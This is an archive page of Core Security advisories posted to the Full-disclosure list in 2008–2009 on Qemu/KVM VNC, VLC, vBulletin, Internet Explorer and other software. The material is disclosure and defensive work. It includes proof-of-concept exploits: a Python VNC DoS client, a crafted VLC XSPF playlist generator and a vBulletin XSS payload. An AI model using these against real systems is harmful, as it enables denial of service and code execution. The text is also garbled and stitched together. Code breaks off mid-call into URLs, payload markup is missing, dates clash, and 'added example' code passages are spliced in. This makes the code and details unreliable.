Core notifies the TightVNC and UltraVNC teams that the advisory will be
released on Feb 3rd 2009, given that the vulnerability was already made
public [5].

. 2009-02-02:
UltraVNC team notifies Core that a fix has been produced and will be
available to the users on Tuesday, Feb 3rd.

. 2009-02-02:
TightVNC team notifies Core that a patched version will be available to
the users on Tuesday, Feb 10th.

. 2009-02-03:
CORE-2008-1009 advisory is published.


10. *References*

[1] http://www.uvnc.com.
[2] http://www.tightvnc.com.
[3] http://www.realvnc.com.
[4] UltraVNC binary patches:
http://support1.uvnc.com/download/vncviewer_1054_w32.zip and
http://support1.uvnc.com/download/vncviewer_1054_X64.zip.
[5] http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564.



13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1211: Amaya web editor XML and HTML parser vulnerabilities

2009-01-28 Thread Core Security Technologies Advisories
 exhaustive enumeration of the stack-based buffer
overflows that can be found in Amaya. Remarkably, in the unpatched
version, files 'html2thot.c' and 'xml2thot.c' contain many general
purpose buffers defined as

/---

char msgBuffer[MaxMsgLength]
---/

and the length of these buffers is generally not checked by the
functions that write into them (e.g. 'strcpy', 'sprintf', etc.).


9. *Report Timeline*

. 2008-12-18: Core notifies the vendor of the vulnerability.
. 2008-12-19: Vendor requests information about versions tested.
. 2008-12-19: Core notifies the vendor that the vulnerability was tested
on Amaya 11.0 and 10.0 (Windows XP).
. 2008-12-29: Core offers to send the advisory draft to the vendor and
offers to negotiate the publication date.
. 2009-01-08: Core sends the advisory draft to the vendor.
. 2009-01-09: Vendor informs that the bugs were fixed in the CVS version
and will be included in version 11.1 by the end of January.
. 2009-01-12: Core requests a more precise date.
. 2009-01-14: Vendor suggests publishing the advisory on January 28th, at
the same time as the release of Amaya 11.1.
. 2009-01-14: Core confirms to the vendor that advisory CORE-2008-1211 will
be published on January 28th.
. 2009-01-28: Core publishes advisory CORE-2008-1211.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities

2009-01-08 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1210: Qemu and KVM VNC server remote DoS

2008-12-22 Thread CORE Security Technologies Advisories

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Qemu and KVM VNC server remote DoS



1. *Advisory Information*

Title: Qemu and KVM VNC server remote DoS
Advisory ID: CORE-2008-1210
Advisory URL: http://www.coresecurity.com/content/vnc-remote-dos
Date published: 2009-12-22
Date of last update: 2008-12-19
Vendors contacted: Qemu and KVM teams
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32910
CVE Name: N/A


3. *Vulnerability Description*

The VNC servers of the Qemu and KVM virtualization solutions are
vulnerable to a remote DoS: specially crafted packets received by the
host VNC server cause an infinite loop.

Successful exploitation causes the host server to enter an infinite loop
and cease to function. The vulnerability can be triggered remotely by
external hosts or virtualized guests. No special privileges are required
to perform the Denial of Service.


4. *Vulnerable packages*

   . Qemu 0.9.1 and older
   . kvm-79 and older


5. *Vendor Information, Solutions and Workarounds*

Qemu and KVM teams will release patches that fix this vulnerability.


6. *Credits*

This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.


7. *Technical Description / Proof of Concept Code*

The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c'
in kvm-66) is in charge of processing incoming VNC low-level messages. A
listing of the vulnerable source follows:

/---

vnc.c
1185:   static int protocol_client_msg(VncState *vs, uint8_t *data, size_t len)
1186:   {
1187:       int i;
1188:       uint16_t limit;
1189:
1190:       switch (data[0]) {

...

1201:       case 2:
1202:           if (len == 1)
1203:               return 4;
1204:
1205:           if (len == 4)
1206:               return 4 + (read_u16(data, 2) * 4);

---/

When the VNC server receives a message consisting of '\x02\x00\x00\x00',
'read_u16()' returns zero, so the function returns 4 + 0 * 4 = 4, the
same length it was just handed. The caller therefore never consumes the
message and keeps calling this function with the len parameter equal to
4, which is the infinite loop.
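As an added example, not Qemu's or KVM's code, a C model of the length contract in the listing above: a SetEncodings handler shaped like the vulnerable one beside a corrected one, driven by a simulated read loop that reports whether the 4-byte message is ever consumed. The handler and loop names are this example's own, and the fix shown is this example's, not necessarily the vendors' patch.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Big-endian 16-bit read, as in the RFB protocol. */
static uint16_t read_u16(const uint8_t *data, size_t offset)
{
    return (uint16_t)(((uint16_t)data[offset] << 8) | data[offset + 1]);
}

/* A client-message handler returns 0 once it has consumed a complete
 * message, otherwise the total number of bytes it wants before being
 * called again (the contract the listing above relies on). */
typedef int (*client_msg_fn)(const uint8_t *data, size_t len);

/* SetEncodings handling shaped like the vulnerable listing: with zero
 * encodings, len == 4 yields 4 + 0 * 4 == 4, so the caller asks for the
 * same 4 bytes again, forever. */
static int client_msg_vulnerable(const uint8_t *data, size_t len)
{
    uint16_t limit;
    switch (data[0]) {
    case 2: /* SetEncodings: type, pad, u16 count, then count * s32 */
        if (len == 1)
            return 4;
        if (len == 4)
            return 4 + (read_u16(data, 2) * 4);
        limit = read_u16(data, 2);
        (void)limit; /* the encodings would be applied here */
        break;
    default:
        break;
    }
    return 0;
}

/* Corrected variant (this example's fix): a zero count means the 4-byte
 * header is the whole message, so it is consumed instead of re-requested. */
static int client_msg_fixed(const uint8_t *data, size_t len)
{
    uint16_t limit;
    switch (data[0]) {
    case 2:
        if (len == 1)
            return 4;
        if (len == 4) {
            limit = read_u16(data, 2);
            if (limit > 0)
                return 4 + (limit * 4);
        }
        break;
    default:
        break;
    }
    return 0;
}

/* Model of the server's read loop: 'expect' bytes are handed to the
 * handler and a non-zero return becomes the new 'expect'. Returns the
 * number of handler calls needed to consume the message, -1 if the loop
 * is still spinning after max_calls (the DoS), or -2 if it would block
 * waiting for bytes that are not in 'msg'. */
static int drive_read_loop(client_msg_fn fn, const uint8_t *msg, size_t msglen, int max_calls)
{
    size_t expect = 1;
    int calls = 0;
    while (calls < max_calls) {
        if (expect > msglen)
            return -2;
        calls++;
        int ret = fn(msg, expect);
        if (ret == 0)
            return calls;
        expect = (size_t)ret;
    }
    return -1;
}

/* Constructed inputs: the trigger from the description and a benign
 * SetEncodings message announcing one encoding (Raw, 0). */
static const uint8_t kTriggerMsg[4] = { 0x02, 0x00, 0x00, 0x00 };
static const uint8_t kOneEncodingMsg[8] = { 0x02, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00 };

int main(void)
{
    printf("vulnerable, trigger: %d\n", drive_read_loop(client_msg_vulnerable, kTriggerMsg, sizeof kTriggerMsg, 1000));
    printf("fixed, trigger:      %d\n", drive_read_loop(client_msg_fixed, kTriggerMsg, sizeof kTriggerMsg, 1000));
    printf("fixed, 1 encoding:   %d\n", drive_read_loop(client_msg_fixed, kOneEncodingMsg, sizeof kOneEncodingMsg, 1000));
    return 0;
}
```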


7.1. *Proof of Concept*

The following python script implements a basic VNC client that triggers
the vulnerability on the VNC server.

*NOTE:* Some VNC servers, like KVM, don't bind to 0.0.0.0 by default, but
the server can still be reached from a guest VM when no VNC client is
attached.


/---

Example:

Launch vulnerable qemu:

~$qemu ./test.img - -vnc 0.0.0.0:0

Launch attack:

~$python qemu-kvm-DoS.py localhost 5900

---/



/---

##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types

sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("http://www.coresecurity.com/corelabs.


11. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-0228: Microsoft Word Malformed FIB Arbitrary Free Vulnerability

2008-12-10 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1127 - Vinagre show_error() format string vulnerability

2008-12-09 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf Buffer Overflow

2008-11-04 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-1010: VLC media player XSPF Memory Corruption

2008-10-14 Thread CORE Security Technologies Advisories
sassembled vulnerable code:

/---

70246981   .  39C2         CMP EDX,EAX                       ; i_identifier < i_tracklist_entries?
70246983   .  7D 29        JGE SHORT libplayl.702469AE
70246985   .  8B2B         MOV EBP,DWORD PTR DS:[EBX]        ; EBP = pp_tracklist = 0
70246987   .  8B7C24 44    MOV EDI,DWORD PTR SS:[ESP+44]     ; EDI = p_new_input
7024698B   .  897C95 00    MOV DWORD PTR SS:[EBP+EDX*4],EDI  ; Saves p_new_input in pp_tracklist[i_identifier]

---/

At this point, when parsing the first track of the playlist, the value of
'i_tracklist_entries' is 0. The parser performs a signed comparison
between 'i_identifier' and 'i_tracklist_entries', so by providing a
negative value for 'i_identifier' an attacker can prevent the conditional
JGE jump from being taken. After that, EBP is always 0 and the attacker
controls EDX, so they can write 'p_new_input' to almost any memory
address aligned to a 4-byte boundary. 'p_new_input' is a pointer to a
structure of type 'input_item_t', which holds information about the
playlist item being processed. At 'p_new_input + 0x10' there is a pointer
to the track filename (provided by the 'location' attribute), excluding
the path.

This track filename (which is UTF-8 encoded) is controlled by the user
too, so if an attacker overwrites a specially chosen memory address and
the program executes some instructions that load 'p_new_input' into a
CPU register and perform an indirect call like 'CALL DWORD[R32 + 0x10]'
(where R32 is a 32-bit register), it will be possible to get arbitrary
code execution with the privileges of the current user.
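As an added example, not VLC's code, a C model of the slot check the disassembly above performs beside a corrected check, plus a parser for a track identifier value that applies it; the identifier value from the proof of concept below is used as constructed input, and the function names are this example's own.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

/* Mirrors 'CMP EDX,EAX ; JGE': a signed compare that bounds the slot index
 * only from above, so any negative identifier passes. */
static bool slot_in_range_vulnerable(int32_t i_identifier, int32_t i_tracklist_entries)
{
    return i_identifier < i_tracklist_entries;
}

/* Corrected check: the index must also be non-negative. */
static bool slot_in_range_fixed(int32_t i_identifier, int32_t i_tracklist_entries)
{
    return i_identifier >= 0 && i_identifier < i_tracklist_entries;
}

/* Address 'MOV DWORD PTR SS:[EBP+EDX*4],EDI' targets in a 32-bit process,
 * with EBP = pp_tracklist and EDX = i_identifier (modulo 2^32). */
static uint32_t store_address(uint32_t pp_tracklist, int32_t i_identifier)
{
    return pp_tracklist + (uint32_t)i_identifier * 4u;
}

/* Parses the text of a track identifier and accepts it only if it names
 * an existing slot. Returns the index, or -1 on any rejection. The name
 * and interface belong to this example, not to VLC. */
static long parse_track_identifier(const char *text, int32_t i_tracklist_entries)
{
    char *end;
    errno = 0;
    long long v = strtoll(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0')
        return -1;                      /* not a clean decimal integer */
    if (v < 0 || v > INT32_MAX)
        return -1;                      /* would not survive the cast */
    if (!slot_in_range_fixed((int32_t)v, i_tracklist_entries))
        return -1;                      /* outside the allocated table */
    return (long)v;
}
```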

The following Python code will generate an XSPF file that, when opened
with VLC media player 0.9.2, will crash the application when trying to
write 'p_new_input' to memory address 41424344.

/---

xspf_file_content = '''

http://xspf.org/ns/0/";>
XSPF PoC
C:\My%20Music\playlist.xspf


-1873768239
C:\My%20Music\Track1.mp3
http://www.videolan.org/vlc/playlist/0";>

239099


http://www.videolan.org/vlc/playlist/0";>



'''

crafted_xspf_file = open('playlist.xspf','w')
crafted_xspf_file.write(xspf_file_content)
crafted_xspf_file.close()

---/


9. *Report Timeline*

2008-10-10: Core Security Technologies notifies the VLC team of the
vulnerability, and that the advisory CORE-2008-1010 will be published on
October 14th, since the vulnerability is already fixed in VLC versions
0.9.3 and 0.9.4.
2008-10-12: VLC team confirms that the vulnerability has been fixed (the
vulnerability was discovered and fixed by the VLC team on September 15th).
2008-10-14: Advisory CORE-2008-1010 is published.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-0126: iPhone Safari JavaScript alert Denial of Service

2008-09-12 Thread Core Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


[Full-disclosure] CORE-2008-0813 - vBulletin Cross Site Scripting Vulnerability

2008-08-20 Thread CORE Security Technologies Advisories

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

   vBulletin Cross Site Scripting Vulnerability


*Advisory Information*

Title: vBulletin Cross Site Scripting Vulnerability
Advisory ID: CORE-2008-0813
Advisory URL: http://www.coresecurity.com/my-advisory
Date published: 2008-08-20
Date of last update: 2008-08-19
Vendors contacted: vBulletin team
Release mode: Coordinated release


*Vulnerability Information*

Class: XSS flaw
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A 
CVE Name: N/A   


*Vulnerability Description*

vBulletin [1] is a community forum solution for a wide range of users,
including industry leading companies. An XSS vulnerability has been
discovered that could allow an attacker to carry out an action
impersonating a legitimate user, or to obtain access to a user's account.
This flaw allows unauthorized disclosure and modification of
information, and it allows disruption of service.


*Vulnerable Packages*

. vBulletin 3.7.2 Patch Level 1.
. vBulletin 3.6.10 Patch Level 3.
. Older versions are probably affected too, but they were not checked.


*Non-vulnerable Packages*

. vBulletin 3.7.2 Patch Level 2.
. vBulletin 3.6.10 Patch Level 4.


*Vendor Information, Solutions and Workarounds*

The vBulletin team has released patches for this flaw (see [2]), and new
fixed versions of vBulletin (3.6.11 and 3.7.3) will be available on
Tuesday, August 26th. Refer to [3] for more details.


*Credits*

This vulnerability was discovered and researched by Federico Muttis from
Core Security Technologies.


*Technical Description / Proof of Concept Code*

This is a Cross Site Scripting (XSS) vulnerability within the vBulletin
community forum solution. In order to exploit this flaw the following
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). Many forums have this option
enabled by default for all new users.

The title is not being encoded in the following rendered HTML code:

/---



---/

The variable '$newpm[title]' in 'install/vbulletin-style.xml' was
previously de-sanitized in 'global.php' and only slash-escaping survives:

/---

// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND
    $vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND
    !defined('NOPMPOPUP'))
{
    $userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
    $userdm->set_existing($vbulletin->userinfo);
    $userdm->set('pmpopup', 1);
    // 'pmpopup' tells db_update to issue a shutdownquery of the same name
    $userdm->save(true, 'pmpopup');
    unset($userdm);

    if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
    {
        $newpm = $db->query_first("
            SELECT pm.pmid, title, fromusername
            FROM " . TABLE_PREFIX . "pmtext AS pmtext
            LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
            WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
                AND pm.folderid = 0
            ORDER BY dateline DESC
            LIMIT 1
        ");

        // the stored (HTML-encoded) values are decoded here and only the
        // JavaScript quote/slash escaping is applied afterwards; nothing
        // re-encodes them for the HTML context before they reach the template
        $newpm['username'] = addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
        $newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'], true), '"');
        $shownewpm = true;
    }
}

---/

This, of course, allows XSS attacks.
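The encoding mismatch described above, as an added Python example that is not vBulletin's code: `unhtmlspecialchars` and `addslashes_js` are approximations of the vBulletin helpers, `SAMPLE_STORED_TITLE` is a constructed PM subject, and `hardened_popup_title` is the assumed fix (re-encode for the HTML context before the JavaScript escaping).

```python
import html
import re

# Constructed sample: a PM subject as vBulletin would store it (HTML-encoded),
# shaped like the advisory's PoC. Not taken from a real forum.
SAMPLE_STORED_TITLE = "Hello --&gt;&lt;script&gt;alert(/xss/.source)&lt;/script&gt;"


def unhtmlspecialchars(text: str) -> str:
    """Approximation of vBulletin's unhtmlspecialchars(): decode the stored
    entities back to raw characters. This is the de-sanitizing step in
    global.php that the advisory describes."""
    return html.unescape(text)


def addslashes_js(text: str, quote: str = '"') -> str:
    """Approximation of vBulletin's addslashes_js(): escape backslashes, the
    chosen quote character and line breaks so the value can sit inside a
    JavaScript string literal. It leaves '<', '>' and '&' untouched, so it
    offers no protection for the surrounding HTML/script context."""
    out = text.replace("\\", "\\\\").replace(quote, "\\" + quote)
    return out.replace("\r", "\\r").replace("\n", "\\n")


def vulnerable_popup_title(stored_title: str) -> str:
    """The flow from global.php: decode, then only JS slash-escaping survives."""
    return addslashes_js(unhtmlspecialchars(stored_title), '"')


def hardened_popup_title(stored_title: str) -> str:
    """Assumed fix for this example: re-encode the decoded title for the HTML
    context first, then apply the JavaScript string-literal escaping."""
    decoded = unhtmlspecialchars(stored_title)
    return addslashes_js(html.escape(decoded, quote=True), '"')


# Tokens that can close the surrounding HTML comment or open/close a tag.
HTML_BREAKOUT = re.compile(r"-->|</?[A-Za-z]")


def breaks_html_context(rendered: str) -> bool:
    """Review check over a rendered value: True if it still carries tokens
    that escape the HTML/script context it is embedded in."""
    return HTML_BREAKOUT.search(rendered) is not None


if __name__ == "__main__":
    for label, fn in (("vulnerable", vulnerable_popup_title),
                      ("hardened", hardened_popup_title)):
        out = fn(SAMPLE_STORED_TITLE)
        print(f"{label:10s} breaks context={breaks_html_context(out)}  {out}")
```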

The 'alert' Proof of Concept (PoC) exploit would be to write a PM to the
user you want to attack with this subject:

/---

- -->alert(/xss/.source)

[Full-disclosure] CORE-2008-0103: Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass

2008-08-14 Thread CORE Security Technologies Advisories

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Internet Explorer Zone Elevation Restrictions Bypass and Security Zone
Restrictions Bypass


*Advisory Information*

Title: Internet Explorer Zone Elevation Restrictions Bypass and Security
Zone Restrictions Bypass
Advisory ID: CORE-2008-0103
Advisory URL:
http://www.coresecurity.com/content/internet-explorer-zone-elevation
Date published: 2008-08-13
Date of last update: 2008-08-13
Vendors contacted: Microsoft
Release mode: Coordinated release


*Vulnerability Information*

Class: Zone Elevation Restrictions Bypass and Security Zone Restrictions
Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 30585   
CVE Name: CVE-2008-1448 


*Vulnerability Description*

Internet Explorer introduces the concept of URL Security Zones, which
basically define a set of privileges for web applications (such as, for
example, accessing and/or modifying the local computer files) depending
on their level of trustworthiness.

Issues have been found in the way that security policies are applied
when a URI is specified in the UNC form:
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'

* When a remote site attempts to access a local resource, Internet
Explorer will fail to enforce the Zone Elevation restrictions.

* When browsing a remote site, Internet Explorer will not apply the
right Security Zone permissions, allowing a site belonging to a less
secure zone to be treated as one belonging to a more privileged zone.


*Vulnerable Packages*

. Internet Explorer 5 under Windows 2000/2003/XP
. Internet Explorer 6 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows Vista (when protected mode is turned
off)


*Non-vulnerable Packages*

. This vulnerability is addressed by Microsoft Security Bulletin
MS08-048 [1]


*Vendor Information, Solutions and Workarounds*

Microsoft has issued Security Bulletin MS08-048 to address this
vulnerability. The bulletin includes workarounds and mitigating factors.
For more information refer to the bulletin:
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx

Workarounds communicated by the vendor include:

* Locking down the MHTML protocol handler. Below are the required
registry changes.

/---

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN]
"explorer.exe"=dword:00000001
"iexplore.exe"=dword:00000001
"*"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4]
"mhtml"="mhtml"

---/

* Disabling the MHTML protocol handler. To disable the protocol handler,
follow these steps:

1. Click Start and then click Run. Enter regedit.exe in the text box and
click OK.
2. Navigate to
HKEY_CLASSES_ROOT\CLSID\{05300401-BCBC-11d0-85E3-00C04FD85AB4}.
3. Right click {05300401-BCBC-11d0-85E3-00C04FD85AB4} and select
Permissions.
4. Click Advanced.
5. Deselect "Allow inheritable permissions from the parent to propagate".
6. Click Remove, and then click OK. Click Yes and OK on subsequent screens.


*Credits*

This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Technologies.


*Technical Description / Proof of Concept Code*

Internet Explorer is the most popular Internet browser in the world as
it is an integrated component of every Windows installation. It
introduces the concept of URL Security Zones, as explained in [2], which
basically define a set of privileges for web applications (such as
accessing and modifying the local computer files) depending on their
level of trustworthiness, namely:

* Local Intranet Zone: for content located on an organization's
intranet. Because the servers and information are within an
organization's firewall, it is reasonable to assign a higher level of
trust to content on the intranet.

* Trusted Sites Zone: for content located on Web sites that are
considered more reputable or trustworthy than other sites on the
Internet. Assigning a higher level of trust to these sites minimizes the
number of related authentication requests. The user adds the URLs of
trusted Web sites to this zone.

* Internet Zone: for Web sites on the Internet that do not belong to
another zone. This default setting causes Internet Explorer to prompt
the user whenever potentially unsafe content is about to be downloaded.
Web sites that are not mapped into 

[Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability

2008-08-05 Thread CORE Security Technologies Advisories
itrary code
execution by an unprivileged user.
. 2008-08-04: CORE-2008-0716 advisory is published.




*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2008-0125: CitectSCADA ODBC service vulnerability

2008-06-11 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2008-0126: Multiple vulnerabilities in iCal

2008-05-21 Thread Core Security Technologies Advisories


[Full-disclosure] CORE-2008-0129 - Wonderware SuiteLink Denial of Service vulnerability

2008-05-06 Thread CORE Security Technologies Advisories

